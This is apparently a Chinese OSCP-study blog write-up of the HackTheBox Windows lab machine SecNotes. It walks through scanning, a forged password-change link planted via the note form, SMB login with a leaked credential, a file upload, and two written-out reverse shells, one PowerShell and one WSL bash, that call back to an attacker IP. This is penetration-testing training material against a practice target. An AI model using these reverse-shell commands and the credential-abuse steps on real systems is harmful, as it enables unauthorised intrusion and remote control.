OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

Ethan医生1周前靶场22

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)

image.png

http://10.129.243.247/home.php 

image.png

访问80端口后注册一个test01,发现提供用户名tyler

有可以更换密码的接口

http://10.129.243.247/change_pass.php


http://10.129.243.247/submit_note.php

image.png

存在XSS

image.png

然后就可以测试看看如果是作者发现到别人给他的note会不会去点击可以测试下

发送http的话作者会取点击 就依照这个点 去修改作者的密码 然后让我可以使用

http://10.129.243.247/change_pass.php?password=123456&confirm_password=123456&submit=submit

如果不行可能需要localhost

http://localhost/change_pass.php?password=123456&confirm_password=123456&submit=submit

登入上了发现有三个note

image.png

image.png

\\secnotes.htb\new-site

tyler / 92g!mA8BGjOirkL%OG*&

尝试看看使用这个去登入445获取相关资料

image.png

smbmap -H 10.129.243.247 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' -r "new-site"

image.png


iisstart.htm不就是8808端口的么。


smbclient \\\\10.129.243.247\\new-site -U tyler%'92g!mA8BGjOirkL%OG*&',上传挡案


image.png

image.png


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.43',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

image.png

image.png

有个BASH.LNK

一个链接

 

这台机器上装了linux的子系统,我们找下bash的具体位置

 

我们cd 到Windows目录下用dir查找下

dir *.exe /b/s | findstr bash


我们查看下.bash_history的内容


提权点是

wsl.exe which bash


wsl.exe bash -c "/bin/bash -i >& /dev/tcp/10.10.16.43/3333 0>&1"

image.png

image.png


登上后下载root.txt挡案


image.png



标签: OSCP

相关文章

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x56_HackThBox靶机_Windows_worker

OSCP备考_0x56_HackThBox靶机_Windows_worker

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

 OSCP备考_0x35_HackThBox靶机_Ready

OSCP备考_0x35_HackThBox靶机_Ready

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)http://10.129.92.20:5080/dashbo...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。